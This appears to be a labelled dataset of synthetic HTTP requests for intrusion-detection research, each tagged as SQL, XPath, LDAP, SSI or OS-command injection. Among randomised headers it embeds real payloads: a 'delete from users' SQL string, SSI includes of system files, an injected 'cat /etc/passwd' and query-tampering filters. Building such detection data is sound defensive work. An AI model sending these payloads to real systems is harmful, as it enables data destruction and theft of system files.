Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1250;q=0.3, utf-7, koi8, ks_c_5601-1987;q=0.8
Accept-Encoding: deflate, deflate, identity;q=0.1, gzip, compress
Accept-Language: yn0i-l5ie0ne;q=0.8, tld0mros-Slrm5oe;q=0.8, loigesa0-i
Cache-Control: max-age=05278
Client-ip: 227.250.97.152
Cookie: snsu3ieles4i=086;ylhna7pri=erh-yUqaxVzQ
Cookie2: $Version="21"
Date: Wed, 16 Jun 04 17:55:14 CET
ETag: W/"XVnSSkhMGncEq258"
Expect: eyzT
From: 5ygo@eiccrasaq.org
If-Modified-Since: Fri, 13 May 05 14:06:49 CET
If-Unmodified-Since: Fri, 29 Aug 08 03:29:59 CET
If-Match: "O1wyZemSQkBVGoIci"
If-None-Match: *
If-Range: "B@RpB24hyMdcOlcD"
Max-Forwards: 31
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic aTFhdGw6bmFhc0ZIZWE=
Authorization: Basic YnNsZnc6bWhpNA==
Range: -399013
Referer: http://imeh.cz/nbireq/eiit9tc/gbtu4a.mp3
TE: trailers,chunked
Trailer: User-Agent
User-Agent: cn4ra8c/0.6.5.9
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 625x983
Via: 0.6 209.184.122.136:44654, FTP/9.5 www.nwomeWer.jpg, deh/2.2 www.ttsxys.shtml
Transfer-Encoding: gzip
Upgrade: cdl/2.8, oueiab/2.3, nfnoc/8.1
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 10989646571343616
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36321
Start - Id: 41347
class: SqlInjection
GET /t.Y_/nOFVGyvJfmW2wmqyvYZ5/PMX/eariEleonmeeT/be7/DGBKqYkC/mwi/NWne1R@jNNvft@Q/hqsS0iLArtdszBs-/eXEG@_KS/ifnI.bin?miohepouoob=5429 HTTP/1.0
Host: www.MyjhshwdTr.de
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: i1dO8nAa-scdr, ioa-Naslol, nb-hha5yi, v8-hoSeee;q=0.3
Cache-Control: no-store
Client-ip: 112.221.53.161
Cookie: ebsa=NhfeieoaerT4d0L7ro;Isrei2Ityt6=' ); delete   from    users; commit;  dummy(  ';ehstoueaoI=aeBkQ;kC9copt1QUyIIa=e3XBFGwcX;ewhhhas=98;axo=eEidcwf4s
Date: Tue, 18 Nov 08 24:10:43 CET
ETag: "5o@y7GUeCd_fs.O"
Expect: 100-continue
If-Modified-Since: Sat, 14 Feb 04 12:28:59 UTC
If-Unmodified-Since: Sat, 19 Jul 08 16:30:33 GMT
If-Match: *
If-None-Match: "Sv6z2o@0BhnwBXZ4oz"
If-Range: Mon, 09 Jul 07 20:10:26 UTC
Max-Forwards: 41
Referer: http://www.nSryy.be/teDootm0/leeqfHa/tDiErbtD.asmx
User-Agent: dHqKSqd http://www.q5hk.de
Via: FTP/5.6 51.72.135.140, 5.9 www.wotxuna.png:27747
Warning: 255 www.TeptIrya.htm "oeGTNlhtku" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41347
Start - Id: 39131
class: SSI
GET /e.TZ6kt3HcyqOEgl/haa5dmiot/XaMWPoinput_MpL_/u0Sc1t.js? HTTP/1.1
Host: 110.238.116.234
Connection: ehhoee
Accept: text/*;q=0.7, application/*
Accept-Charset: x-mac-icelandic;q=0.2, iso-8859-1
Accept-Encoding: gzip;q=0.2, compress
Accept-Language: <!--#echo var="date_gmt"-->
Cache-Control: no-transform
Client-ip: 9.166.171.211
Cookie: eeeW4aobt4nswno=wegb;iafecuNee1Rihl=0R2fqcGiz;xuiAtn9cvsPs=mgVlArap;gddz0edegid=crrh;VmetadjQ1Vu0afY=htaccest$ []f fw86p aa|8<
Date: Sat, 04 Apr 09 06:32:58 GMT
Expect: 100-continue
If-Modified-Since: Thu, 03 Jan 08 19:55:25 CET
If-Unmodified-Since: Sun, 18 Nov 07 18:05:10 UTC
If-Range: *
Max-Forwards: 320
Pragma: 2=eihht
Proxy-Authorization: Digest nonce
Authorization: Basic d25Jcm46ZWlkY3ZM
Referer: http://www.uoaacb.net/racE.jpeg
TE: trailers,gzip
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 1.0; tf-n5; rv:0.7.1) Gecko/52858982
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 062x6317
Via: 8.5 120.88.245.175, 7.6 www.l5wie8.htm
Transfer-Encoding: compress
Upgrade: ovle/8.4, aroHm/4.2
Warning: 897 250.38.91.23:5 "auyT" "Wed, 26 Oct 05 13:46:39 UTC"
X-Forwarded-For: 216.246.247.139
X-Serial-Number: 55795183768
~~~~~: ~~~~~~~~~~~~

null

End - Id: 39131
Start - Id: 35285
class: SqlInjection
GET /a6al4/so4M5oninnt1n/rfEtstneOhenei/jXWXB.png?Te5maA=eulink&heame1=aj7c&9taosne=OR+%27aa%27++++%3D++++%27Sim%27%2B%27ple%27&mDssit1i8sanr=7 HTTP/1.1
Host: www.1fana.com:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-9, macintosh, x-mac-korean;q=0.9, windows-874;q=0.8, iso-8859-1;q=0.2
Accept-Encoding: *
Accept-Language: eueo-sogeaEsE
Cache-Control: only-if-cached
Client-ip: 117.242.130.149
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="2"
Date: Tue, 13 May 08 14:15:52 CET
ETag: W/"vmH-L9PypMfTEzq34uXU"
Expect: tomlS4
From: g1swIsn@rorentof.uk
If-Modified-Since: Wed, 26 Nov 08 09:58:44 CET
If-Unmodified-Since: Sun, 04 Feb 07 18:37:10 CET
If-Match: *
If-None-Match: "0oEmttD7D49uyqyTF3Z"
If-Range: Tue, 01 Jun 04 10:38:23 UTC
Max-Forwards: 664
MIME-Version: 8.3
Pragma: O=xEupnsst
Proxy-Authorization: NTLM bnFzaU5lenR0dWVzeFNuZXNiaVRsTFNiMnNhMmRzc3dhdGZzNg==
Authorization: NTLM cnRydTI3cWhkZXByUm51c3R3dG5yZXRucm5pbW41cm9OZ2Q1cXhvU3R5ZWs=
Range: 930-456,2355-
Referer: /rienrae/2aFau4g.nsf
TE: deflate;q=0.4,chunked;q=0.8,gzip;q=0.9
Trailer: Warning
User-Agent: ITfcm5iukhor7Lne
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9202x764
Via: 2.2 www.ionv.jpeg, e1nEni/4.6 255.165.90.18:2
Transfer-Encoding: identity
Upgrade: bkt1c/0.9, a15/2.9, cEsxaa/0.5
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 019195237
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35285
Start - Id: 40358
class: SSI
GET /rczFbbvcfIGXhHe-5R@G/D0d@home3E@RlbinIjFF/ehpDpr@j76gu.htm?zisnETtwr0iBans=3&Esme=GllieIi1dhxg&tM6taonDO=79&Ent9=c+H&loephTiNh=t%5C&tescyfIinEqt=n9ge6&eobhtnarciep=e13jubemusmWheJhni&efw8keieox4=1eoi&P@KkW@F=%26h&Q@VrwRNwhereO-V=YtQeaa&lmieuim=964744&nsw=4163482987&Qfraor=36&cyioeg=ifMZvd&setdltcz3t=insertjk HTTP/1.1
Host: 93.212.235.61
Connection: eetTtor
Accept: image/*;q=0.5, application/rtf;q=0.8, text/html;q=0.9
Accept-Charset: windows-1255;q=0.3
Accept-Encoding: identity, deflate, compress
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 225.218.231.89
Cookie: IuiEu=17766;mhFenn1Efmde=0tnralselslb;a1=eJJ6f
Cookie2: $Version="4"
Date: Sat, 17 Oct 09 01:39:26 GMT
ETag: "Rx_E-BR84jvDVoRCBf"
Expect: 6tot=dpitp
From: ly1Ctt36@ssTtb.be
If-Modified-Since: Tue, 17 May 05 03:25:48 CET
If-Unmodified-Since: Sat, 19 Apr 08 14:05:57 UTC
If-Match: "ypBuvIZh.2cFFVP@0GRc"
If-None-Match: "XIZr@hxef9ErYPgF"
If-Range: Sat, 08 May 04 06:39:34 GMT
Max-Forwards: 9
MIME-Version: 6.8
Proxy-Authorization: naloy alan=tiklUu
Authorization: Basic RHJkOTp5dGFyNG8=
Range: -62942,193769-
Referer: http://AuiltL.be/tesDaAlo/kdnA/aTelhesG/ltEuei/cOnssls.swf
TE: chunked;q=0.5
User-Agent: <!--    #include   virtual="c:\winnt\system.ini"   -->
UA-CPU: StrongARM
UA-Pixels: 7186x8117
Via: 7.6 161.93.150.224
Transfer-Encoding: gzip
Upgrade: fwr/8.8, o6abt/9.6
Warning: 214 www.ioarta.gif "t2kbllTyjTr61loIramt" "Sun, 01 Jul 07 21:32:40 UTC"
X-Forwarded-For: 76.58.9.70
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40358
Start - Id: 49444
class: XPathInjection
GET /nigisEh/td/oLfO4T/aise/z6u/evlHvM/y5jnemtejmn7hrbioi/oa.mspx?er=6++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++853%3D HTTP/1.0
Host: 188.249.189.59
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.3, iso-8859-5;q=0.8, euc-tw
Accept-Encoding: 
Accept-Language: koeLa-s, hdmzh-ayIsc, naew4am-bimt;q=0.4, pt9tin-rint8sue;q=0.2
Cache-Control: no-transform
Client-ip: 111.175.169.32
Cookie: eTsRjyOD=Mpassthruhk;amciJn=iEacod coa3xnq 
Cookie2: $Version="10"
Date: Mon, 07 Nov 05 10:32:03 GMT
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Fri, 08 Feb 08 11:02:13 GMT
If-Unmodified-Since: Wed, 13 Oct 04 10:46:39 GMT
If-Match: *
If-None-Match: "RLZiUwFUpGCRBZk7apkN"
If-Range: *
Max-Forwards: 238
MIME-Version: 6.9
Pragma: m=gelnEeb
Proxy-Authorization: Digest nc=3d94f4fE
Authorization: Basic ZWRsY3JsOm5ub2I=
Range: 80-08008,86-2,0-
Referer: http://www.esrXa3kr.cz/oohy0hs/2Tyo/sK4riatn/nwiiUA6/Nrru.tiff
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/9.9 (Windows; U; Win98 2.3; 7h-Lt; rv:3.2.4) Gecko/10403634
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: FTP/3.2 www.2Opg.html:05816, cnt/4.7 123.191.221.150, FTP/8.1 www.lnwmusA.jpeg:38219
Transfer-Encoding: gzip
Upgrade: 4wre/8.6, sckoiq/7.6
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49444
Start - Id: 35525
class: XPathInjection
POST /btttsfttietFqF/OntittrEenq/ra1IrU_rrcpxchildAeval/hOrg73RJNa5KtV5Ax/opta/jtah7Reireceanw9T/onbm7su/tzrxusnlf.swf? HTTP/1.0
Content-Length: 255
Content-Language: n,nCtoneN,tea7
Content-Encoding: identity
Content-Location: http://pinma58.de/yzvwQ/e5dsb/uipnuu/ishita3.htm
Content-MD5: Q2duMTJ1cUJ0b21wd2kyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Nov 06 16:34:15 CET
Last-Modified: Thu, 13 Jan 05 06:14:43 GMT
Host: www.rne9q4lhhl.be:0218
Connection: Aworo
Accept: image/gif
Accept-Charset: isiri-3342;q=0.6, koi8-r;q=0.0
Accept-Encoding: *
Accept-Language: 6TshrI-q0ad, 5ss03xb-rudge, v-xWsy, shdeEEun-StrEr2, oicfh5mt-e;q=0.6
Cache-Control: min-fresh=67
Client-ip: 25.251.158.41
Cookie: LUboot.iniaOEVy=24472;168sqtrrtolps=erR
Cookie2: $Version="982"
Date: Sat, 24 Jan 04 08:21:10 CET
ETag: "pjVM2@qz7S7-tpwC"
Expect: Zgse=teneo;otninw=mnsa
From: ddsory@ail3hIue.st
If-Modified-Since: Sun, 04 Dec 05 22:35:26 UTC
If-Unmodified-Since: Tue, 19 Jul 05 24:27:24 GMT
If-Match: "OR_kl7Ja7xN5J4NK"
If-None-Match: "KEvsj_Yu0hTdM9t"
If-Range: Tue, 24 Feb 04 22:14:18 GMT
Max-Forwards: 244
MIME-Version: 5.3
Pragma: eahie=ce
Authorization: NTLM dDZ0aGV0c2w3c2toZThlZWVvd3RmNnRpTWVuYU5hYXJpc25oVDVOYXN0cg==
Referer: http://www.tyOEo3k.be/niscbdep/csect.mpg
TE: trailers
Trailer: Max-Forwards
User-Agent: feha/4.6.7
UA-Disp: 740,794,8
Via: HTTP/2.0 40.243.44.154, 6.4 www.tnxyl.shtml
Transfer-Encoding: identity
Upgrade: hs1gw/0.3, rdt/3.0
X-Forwarded-For: 182.111.185.137
----: ---------------------------------

eiyaiu8cht=jooineoneurebos<an&dfeaesXnbs= a&keToegq4owudet=1ap/ta/n/child::node()[position()=702]   or  'hcenHuly' =  '&o8hts=t&2laaohdcb=refen&6eehoEngbShl=3an+nai0s&hmdAi=eroefJs&eLihhesgt=846876262&roMMsescW=sqrzQ7qL

End - Id: 35525
Start - Id: 48719
class: XPathInjection
GET /n5elmTei/5p-1gQstMTUoXx9C8H1/ryf_jR/ttttv7ddn/rwEYb6cLpiGsmCw/n0Do/GOnHUaAE/etcLpree2syra.htm?E0misvh=i%3E6ya9R&dnKee=1whht&t2ee3ystyneIi=ftpps1&aoa=n%2Fel%2Fn7tAz&dierenheeK1=nnoCfacbsnrhbl&rmh0gzeEt7nia=331587&SIYR=nlaoas1aohceno&FBw6metajBe934X=i&YYgX8N=3difva%27+++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+%27dpco%27%3D+%27&5hctlT=1718293&9Ry1p8t1Ninq=tD9andndr&tese=78797284&iept=ettefe HTTP/1.1
Host: www.rHo5h9se.it
Connection: close
Accept: audio/*;q=0.8, image/*;q=0.3
Accept-Charset: isiri-3342, iso-8859-1, iso-8859-15;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.6
Cache-Control: max-stale=96732
Client-ip: 38.215.80.1
Cookie: dPwos9orVet=hlrconnect;QKa=]aoi;laTaoaxENE=54;Oto=zaenosno65e96;eagthroh9n= ttetr\9itdetcyny;hAoryetrewvrn=00607839
Cookie2: $Version="7"
Date: Sat, 03 Jul 04 10:31:20 UTC
Expect: 100-continue
From: raanojj@nQhsOlcaae.ch
If-Modified-Since: Fri, 06 Aug 04 23:15:33 CET
If-Unmodified-Since: Wed, 13 Jan 10 10:06:06 UTC
If-Match: "3VPG4W1@UZ_oAAAC"
If-None-Match: "HVfZkgOFn0pqzQK8cc7"
If-Range: Fri, 06 Feb 04 19:27:57 UTC
Max-Forwards: 21
Pragma: a2sw='soaurw'
Proxy-Authorization: Basic d3huRXUyaTp0cWFtYw==
Authorization: Digest response="2d061edCDdeBC6976Ae414Fbd85c3Ef0"
Range: 10010-
Referer: http://www.2uadn1cb.fr/ttybi.sh
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.9 (Machintosh; U; Mac OS X 2.8; up-i3; rv:5.0.2) Gecko/66707011
UA-CPU: MIPS
Via: FTP/0.4 www.D0nabna.html, 2.5 www.elei5u.png:4, bt9t/5.9 www.l8t6ea.js:491
Transfer-Encoding: identity
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
Warning: 042 95.15.3.29 "ettnnbeaTz7i" "Fri, 29 Apr 05 11:16:46 UTC"
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48719
Start - Id: 42693
class: SqlInjection
POST /olheCrR10if0bOs/nEaeru/tPDMP.nsf? HTTP/1.1
Content-Length: 139
Content-Language: f4a,oistien
Content-Encoding: gzip
Content-Location: /t6aoe9r/r82tw/hlafehh.tar
Content-MD5: OE9vOGFub1RvY21hZmhodA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Dec 08 03:58:38 UTC
Last-Modified: Sun, 13 Sep 09 18:01:48 GMT
Host: www.ceoweee.ch
Connection: close
Accept: video/quicktime
Accept-Charset: gb2312, utf-8;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: OR     'eeIdr' IN (    '    '  )
Cache-Control: max-stale
Client-ip: 122.44.205.224
Cookie: tc=m%-ejwheremochaj;uzine5egetfg=oed31lSiB8irdrt;aj=igiRJYU4QcwZ;48ai=34169940;i4w=[dor"i1 2"yi1ebnpositionnc
Cookie2: $Version="319"
Date: Fri, 08 Jun 07 06:34:08 GMT
ETag: W/"S1lPB2U4Y7tTOb9"
Expect: xotSS6
From: ntoittcr@aetm8itm.uk
If-Modified-Since: Tue, 13 May 08 23:06:57 CET
If-Unmodified-Since: Tue, 27 Dec 05 21:10:05 UTC
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM ZWNvaFdkZXJtcHY2cnNlSUZzZTNoaXI4aU1jZWhjbHR1cmFs
Authorization: NTLM bGFyc25kZWFic2tlbmlhZWRJZWVybmtub2VlZXl4cGl0dDEwb2NhSE8=
Range: 2455-
Referer: http://www.5tbscann.gov/aayEahcn/n9tla/uTshee7.php
TE: deflate;q=0.5,deflate;q=0.0,gzip;q=0.4
User-Agent: Mozilla/1.2 (X11; U; Open BSD i386 1.3; Nn-t9; rv:6.9.2) Gecko/47161161
UA-Disp: 446,0818,16
UA-OS: WinNT
UA-Color: color8
Via: oswahw/7.1 198.143.192.114, 9.2 180.187.195.163, HTTP/4.9 104.247.105.12
Transfer-Encoding: deflate
Upgrade: di2/3.5, 6tBsi/4.2
Warning: 248 46.143.254.105 "nuealiiveobrbie" 
X-Serial-Number: 0088484140288112965
----: ------------
~~~~~: ~~~~~~~~~~~~~~

xoo=etHloeoraseM&htny3rgaShvyt9=5358&wtzmnzrhes1r=ntur&TesifiBOte9mlh=i:negi|p utAs <select&qineel8e=ElyytkehntlF&licsEeEthn2=ibiexts

End - Id: 42693
Start - Id: 40451
class: SSI
GET /formm/VinputXu.cfm?lAoosooie9nnNtv=cB7a_7W&ohiiriewt1=3U9.3&ughoDeroarhmwt=accept%3Bykihtpassodkp%29vetcHuwi&EymnooRe=a+aI&OmbblTrtt1=790&lr50xi9nmtt7is=cexaaplt0qeuhaBca&gwel=8722216&MhomeBlibcmdxamocha8BD=nfe&lzevmlonoeilon=ug%2Frpecmdt+r3h&eyashsrEiNetoo=%3C%21--%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&X6AFj=0 HTTP/1.0
Host: www.ieyLn9x.ch:17189
Connection: elgee
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: gbb8-eastea;q=0.8, qsysz-ea3es;q=0.6, tN-e3s;q=0.5, 5acy-oztk;q=0.9, azvhnk-cDihxoc
Cache-Control: max-age=4
Client-ip: 183.187.114.208
Cookie: z6eqeOldrlwn= ludtrusr
Cookie2: $Version="879"
Date: Sun, 25 May 08 18:55:52 GMT
ETag: "63htvQ03lV1P1aqZu@3F"
Expect: onof
If-Modified-Since: Sat, 04 Mar 06 14:11:57 GMT
If-Unmodified-Since: Fri, 14 Aug 09 15:42:49 CET
If-Match: *
If-None-Match: *
If-Range: "dRvIvZRddlTCwMD7U"
Max-Forwards: 268
MIME-Version: 3.0
Pragma: au8h4d='aoioeyeu'
Proxy-Authorization: 2eg8q 4ltgtAr9=na5Ilsmg
Authorization: NTLM QWRpcGVvZTh0Y3RzaXBhaWVtdGxlc3RscGxyNW1rMGVmd1hmbjl2YXVJaWVF
Range: 648391-0593,082-86156,297927-83
Referer: /lwlpsg/dneSD/aaE2.jsp
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/2.9 (Windows; U; WinNT 8.2; te-ug; rv:6.0.3) Gecko/79045827
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4401x4707
Via: HTTP/0.9 193.47.198.118, fbob/6.9 42.182.161.56:76
Transfer-Encoding: gzip
Upgrade: Fet/1.1, nsHe/6.2
Warning: 037 www.zncew.jpg "u3loce3odp3oeC" 
X-Forwarded-For: 51.175.205.249
X-Serial-Number: 9011770
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40451
Start - Id: 36640
class: OsCommanding
GET /handler;cat /etc/passwd| ? HTTP/1.1
Host: www.oe4npa.cz:80
Connection: close
Accept: audio/x-wav, video/mpeg;q=0.1, text/*;q=0.7
Accept-Charset: euc-cn;q=0.9, windows-1251;q=0.3, shift_jis, macintosh;q=0.5
Accept-Encoding: deflate;q=0.8
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Cookie: ndhpl1snthiiQp=7;leEd=gxp_tr $foooh slnetcrmCe;eawsnHacaRria=173529427;17sswut=eT04Uyyks;hfseenI=77777982;tsrnfts=psc e 
Cookie2: $Version="74"
Date: Sun, 27 Apr 08 23:30:52 GMT
ETag: W/"Uz@kS7@BDhdUUqlE@y."
Expect: 100-continue
If-Modified-Since: Mon, 11 Feb 08 21:11:40 GMT
If-Unmodified-Since: Thu, 09 Dec 04 21:35:25 UTC
If-Match: *
If-Range: "TTHns58hBv5fwSE6nglX"
Max-Forwards: 1218
Proxy-Authorization: Digest cnonce="giac"
Referer: http://sate.uk/wEieSe/nhtIbcst/Vtualno/nucry/dxne.htm
TE: chunked,trailers,deflate;q=0.5
Trailer: Range
User-Agent: Mozilla/7.1 (compatible; Konqueror/3.9; Linux i586; ofmiotL; 2E2tnh)
UA-Pixels: 073x2396
Via: rcse/6.0 www.iins7on.htm
Transfer-Encoding: gzip

null

End - Id: 36640
Start - Id: 49522
class: XPathInjection
GET /trndE/eslrtoRegih2tWrtwwpz/anYUvu80P4D9N39/syE2/Ieo22ombduMiht/tW4wyq1sT6j.Mtgt/hna8sn65/eJ39N@24s/D_e0HT/pBB/apassthruDjaIR.mspx?vpWz@xtconnect=el7ii%27+or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or++%27ngi%27+++%3D++%27&7ucphhytdw3er=33362&Fy_U-=h&2eoeayh=smnensbbt&-SetcVGFr5=ofa9qQ5A&efIelOnkeswer1h=eircpd%7C&erertai8Ct=l1HaZAg-w HTTP/1.0
Host: 236.186.83.78:00
Connection: close
Accept: */*
Accept-Charset: macintosh, iso-2022-jp;q=0.4
Accept-Encoding: deflate, identity;q=0.8
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 236.52.73.161
Cookie: Pk9DYugN68=9dib;5ntr1o0feueiwo=7482192;YEdt4E63=zTm
Cookie2: $Version="709"
Date: Sat, 18 Jun 05 12:50:30 UTC
ETag: "PYiOA63dgxcGl4SFXO"
Expect: Set5qe
From: eaatpaso@ksiwaan.org
If-Modified-Since: Mon, 07 Aug 06 12:52:21 GMT
If-Unmodified-Since: Fri, 01 Jul 05 12:10:04 UTC
If-Match: "a3.ksc56FP-hu2Fy"
If-None-Match: *
If-Range: *
Max-Forwards: 430
MIME-Version: 4.3
Pragma: u=nclhRsa
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Digest nc=81065811
Range: 72-,357-,72130-42
Referer: /id7oaf/loee.pl
TE: deflate;q=0.5
Trailer: Range
User-Agent: htttiolhS (eUugJeMxT; lraEvXIn; la0MBZmXG; hvaEYwfGK9)
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5470x3164
Via: HTTP/4.1 www.iamhu.png, 5.9 www.telee.css, 1.1 www.nqaientb.html
Transfer-Encoding: njeatr; Mvnh=idaor
Upgrade: 2ao/4.8
Warning: 159 80.118.128.49 "egeLeoxihuinfidnnn3" "Fri, 16 May 08 05:37:47 CET"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 4596241823364339
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49522
Start - Id: 38934
class: LdapInjection
GET /rcgPfN9YVQ8.c/nOR9/za8Q1iNY3Qo9ztlftezs.html?mtUes=11&afrmOhfcNr=20&6aaEinetst=rT%29%28%26%28objectClass+%3D++++eh*%29&ss8be4utua=3mOBidn_&E4xP@DThOH_i=metchZsshesnyr HTTP/1.0
Host: www.knkei1f0ds.de:68996
Connection: eielou
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, compress;q=0.9, identity, gzip;q=0.4
Accept-Language: *;q=0.6
Cache-Control: max-age=15045
Client-ip: 200.234.213.150
Cookie: @U9rIGot.TZH=t&;gMHNebolr=gbzhU;bhbnm=lvee1e2mhzfst$i;henaE7qlw=05030;tevgaZwfrihua=esupdate;cZ.Er6httpsgFprocessing-instruction=eoawget6psOhseuniont%vbscriptnu>|
Cookie2: $Version="0"
Date: Sun, 13 Apr 08 15:11:36 UTC
ETag: W/"Ac9LuAfAS6@WWykdMRiv"
Expect: 100-continue
From: Utnn8c@iodssieo.biz
If-Modified-Since: Sun, 30 Jan 05 13:50:27 GMT
If-Unmodified-Since: Thu, 19 Oct 06 20:44:18 CET
If-Match: "o9Erw-iZr47dkloUl"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: NTLM OW5kOXl0YXNtaFdpaG90ekx3RnQzdWtsZHE0cnZFSXROZWJka24xbXNvZ25yZQ==
Range: 19115-,-68,486-99
Referer: http://EaahIo.fr/etwy/esbsatq.cfm
TE: trailers,gzip;q=0.4
Trailer: Host
User-Agent: ofQTuwV- http://www.foaltyog.uk
UA-CPU: 68000
UA-Disp: 8172,5109,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7088x099
Via: 4.0 www.Mehhis.js:0005
Transfer-Encoding: lhdrd; anhele=levfscj
Upgrade: nocAo/1.3, tgd/7.3, c3isen/9.2, BaeeL/8.6
Warning: 490 107.236.240.80 "Ol4tn7eejtras" "Mon, 14 Jun 04 07:29:54 UTC"
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38934
Start - Id: 39318
class: SSI
GET /n4rr2B9avnr/t3mE/asAVurN3@d3xD1AgcZ/oI8rXu76kHV/e7H@B2k-emWQVnk885/a.7ovt/DdVxI/em7m-V-K/cz_1j5fbokXeLm0x/2nwyer1cdu/sa/cfLAc.php3?8Kv8wgetEeEWOmf=smiec&crea27eo1g=j8&execH6Upsm.=%3C%21--%23email+fromhost%3D%22www.dhadntiz.com%22+tohost%3D%22mailbox.Uhu.com%22+message%3D%22enleI+iaeetd+jou+lol6iu%22+fromaddress%3D%225qatlm.com%22+toaddress%3D%22ser.f7.com%22+subject%3D%22nb%22+sender%3D%22imv3.com%22+replyto%3D%22s3nhti.com%22+cc%3D%22enn%22+inreplyto%3D%22Em+dnd+nu%22+id%3D%22hiaremail%22+--%3E&gkhueb2aty=wn5tmths&fogsaja5=adminsEe&yel3Tos3xt=isng9dqEi8e6&oeAN4eW1Ilru=7245510&cmd4jrnTwe_=vqsTBNBmq4x&nbeirrcrrewoo7w=621550&etn=7p HTTP/1.1
Host: 99.234.60.20
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-y, su5wn-rhOa;q=0.7, tscoa-u219oze0
Cache-Control: no-transform
Client-ip: 192.88.225.132
Cookie: radasdashUgon=npsase&i\ah>7;obect3thlp1=ebjwCZ;lxskCbieHrun=Nd0r7t
Cookie2: $Version="115"
Date: Mon, 10 Nov 08 12:25:43 CET
ETag: "1pA1U.J7IAhA3yekD"
Expect: 100-continue
From: oQtOA@ihnixcoe.fr
If-Modified-Since: Wed, 23 Dec 09 09:17:33 GMT
If-Unmodified-Since: Thu, 18 Dec 08 19:45:20 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Jun 09 03:18:49 CET
Max-Forwards: 49
MIME-Version: 9.8
Pragma: ir6oae='Nrxln'
Proxy-Authorization: hlfen oikmebat=iyvtk
Authorization: Digest realm
Range: 326-,2201-0740,2-99478
Referer: /Fhzedg/agesl/nNelo6t.tiff
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: effAs8dh/8.7.6
UA-CPU: MIPS
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5234x268
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: inler
Upgrade: eseht/3.5, trmE/1.3
